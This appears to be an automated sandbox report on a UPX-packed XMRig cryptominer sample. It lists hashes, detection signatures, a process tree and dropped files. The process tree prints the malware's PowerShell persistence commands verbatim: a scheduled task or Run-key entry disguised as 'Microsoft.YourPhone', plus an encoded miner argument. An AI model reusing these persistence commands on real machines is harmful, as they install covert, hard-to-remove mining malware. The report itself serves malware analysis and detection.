Overview

overview

10

Static

static

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/02/2023, 13:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe

  • Size

    3.7MB

  • MD5

    96468e68d6ad49dd6f074d22b85619cd

  • SHA1

    d84d258d11679b9b4de5b72e247e4de7adc6b316

  • SHA256

    69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b

  • SHA512

    b314fd25bd210a20476c5de219c6967dbfa0f8e1b180e70ccc6b3fe103c7d5e308e1ad1441f0b3ebae30703a994546fb36ca4bce6f0173ccf8545b88c24afca9

  • SSDEEP

    98304:lbug78oVoj15ge6TiKLQI5Fle/x6hJvvfRUq4YBYk:Rx78a816vTiKkI5F8QXl

Score
10/10
xmrigminerupx

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 2 IoCs
    miner
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2616
      • C:\Users\Admin\AppData\Local\Temp\69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe
        "C:\Users\Admin\AppData\Local\Temp\69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:4748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#asbgi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL' /tr '''C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL" /t REG_SZ /f /d 'C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4688
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xwatgy#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL" } Else { "C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2160
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL
          3⤵
            PID:4452
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#asbgi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL' /tr '''C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL" /t REG_SZ /f /d 'C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe' }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2332
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe lvtxrudcdeiffl
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:3860
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4196
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            3⤵
              PID:4684
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
            2⤵
              PID:4728
            • C:\Windows\System32\dwm.exe
              C:\Windows\System32\dwm.exe msgknczdvthndqbs 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUw+V9oqa3SeqtIO6mkmQHVD/ZcrABfHsnFjXW4iNdWOM8EQXEO7XU7P0woczRbsOpO5OLWiBseJZ0Vo/cpj4L9v8ztDjIL21iiKr+6xa1rkuLTnCOFj/EN5A04M2TIYEo3LWhW3qvXTq4ga6bFCoph5bqFOVbTkvtcWwVR443g+V0E4M9spSkHBEmX0cY5XR1j6ajqcejFK+D/95muVyCKP/5JJa/QVeUV//MCMH6e5hc8gTd9CuM8t7ocRTrbn7/idq5w8uN3+OmJ1QZxs3O4cqUjUV2suRX4Y1Zp3d15hnhHZq4M6/8tMEbzlBHhzHU5WhB96nDtYH0m69yLJFEKzp2njjII6ZaA8Oi6k9HCi5RD2b3/PVbkp+tMEtY9N1Mu3PAAh6UteKj6CPd6PC+AFa+J5aqXyZT6I8h0yEwQBbFvcVodZe45tjY4jI/whfHBwU/7GYmirlNGOdYUbOahG4jnPuhLJnTdTg1A1AdXsI+LdeiBA3QmJXlzTHiRY00ZmiKmfBZphSRkwsFjWhT3J/pZ7f9PvaQagjDA/hsay8iJBrWEPk21Hg22UBWj+Lfg1wJ5KZVt4SqmoOpBITJVgLALpXT5/p2AyKn5g2+LRJK/uf7OJ7FLc7nHTsxxSwUA2BdZ2Y/w+4NGYzcfCiM5ZkIRWhzpiDb7eSiBmKZG2FbSOdT8ZN8THc+MKqd49onFp4JJmo49gdX3tnWT0flys+ugSmazO2Ni4hazBsyqY5RH+fvzVtObhhQc67VEy5f3eHPQsNAH9cOx8OTvDsvYMrwMwGbR/9wR0jXOCWhPfvLTMK7A5FsoiXc5EgLSv1H/7moe8qQpzAph1TEDz104ihORRCIXJRI4RXBdIposDZ4DOC9SwuhddBg1Q/Dl42U4lpBLkPx4n4N0Th9MEjSrArHhyQZWKHvcFUGPV0fC96FeEJkAlt6XRIb6Z6TV/mPTfrZZzGaxwmn/AYtnvS9tslsHkgjHWdxe2x4Bprhx9KjedWSPtFGxyngGprPbLOP/xHbNl06ZiJ1dPQ7AUzSQA0bSe34uOMnU0/eNJihDRbNEqZzwCvdncGxFh6a7a8FiOEqTiBriiQ5ecLARTpn20dENmZv3QbCW3KMj87tbcJA1nZbETJb/MTwTTXDdiTd7SWS64kbo8bzMDhJ6dgPtA==
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1444
          • C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe
            C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:964

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            00e7da020005370a518c26d5deb40691

            SHA1

            389b34fdb01997f1de74a5a2be0ff656280c0432

            SHA256

            a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

            SHA512

            9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            41a37326e2cdd02bb17b29f080aac616

            SHA1

            fb5d94044489b5cfd2e17c1f307248467a771355

            SHA256

            2599900ed6c98a939a209d6d3d082fb20e01ddeda3f5f56be8f8232030b117c0

            SHA512

            9eeaec370af56bb5ababd85fb3a94a1ee17e345accf3f95093e42f0923179449ee48d8c2ff937907367f46d0c26988c866f00952150be00e64aee0926284daed

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b6b62fabc50bfae977635bcebb14c566

            SHA1

            653628f0db5229d9136ee897e92bedba3b1d91aa

            SHA256

            bd5e81d2c243ab6465ad978a5124f723b6518c08d63e4ebb386a564ebf3384be

            SHA512

            9bbbbdd9b0571e55065751e2100b21685ef630641bedf53e6a1c8b3ec96606c378ec53d732500e7dc17ae6e3a1b4d37f2fdbec8e493f6bdf10e4b829dad5962f

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

            Download Submit

          • C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe
            Filesize

            3.7MB

            MD5

            96468e68d6ad49dd6f074d22b85619cd

            SHA1

            d84d258d11679b9b4de5b72e247e4de7adc6b316

            SHA256

            69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b

            SHA512

            b314fd25bd210a20476c5de219c6967dbfa0f8e1b180e70ccc6b3fe103c7d5e308e1ad1441f0b3ebae30703a994546fb36ca4bce6f0173ccf8545b88c24afca9

            Download Submit

          • C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe
            Filesize

            3.7MB

            MD5

            96468e68d6ad49dd6f074d22b85619cd

            SHA1

            d84d258d11679b9b4de5b72e247e4de7adc6b316

            SHA256

            69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b

            SHA512

            b314fd25bd210a20476c5de219c6967dbfa0f8e1b180e70ccc6b3fe103c7d5e308e1ad1441f0b3ebae30703a994546fb36ca4bce6f0173ccf8545b88c24afca9

            Download Submit

          • memory/1444-152-0x00007FF687CF0000-0x00007FF6884E4000-memory.dmp

            Filesize

            8.0MB

            Download

          • memory/1444-156-0x00000256CDA10000-0x00000256CDA30000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1444-153-0x00000256CD9F0000-0x00000256CDA10000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1444-157-0x00000256CD9F0000-0x00000256CDA10000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1444-151-0x00000256CD970000-0x00000256CD9B0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1444-158-0x00000256CDA10000-0x00000256CDA30000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1444-155-0x00000256CD9F0000-0x00000256CDA10000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1444-154-0x00000256CD9F0000-0x00000256CDA10000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1444-147-0x00000256CD950000-0x00000256CD970000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1444-148-0x00007FF687CF0000-0x00007FF6884E4000-memory.dmp

            Filesize

            8.0MB

            Download

          • memory/2160-137-0x00007FF9D4060000-0x00007FF9D4B21000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2160-140-0x00007FF9D4060000-0x00007FF9D4B21000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2332-143-0x00007FF9D4060000-0x00007FF9D4B21000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2332-142-0x00007FF9D4060000-0x00007FF9D4B21000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4688-132-0x00000255F23B0000-0x00000255F23D2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4688-134-0x00007FF9D4060000-0x00007FF9D4B21000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4688-133-0x00007FF9D4060000-0x00007FF9D4B21000-memory.dmp

            Filesize

            10.8MB

            Download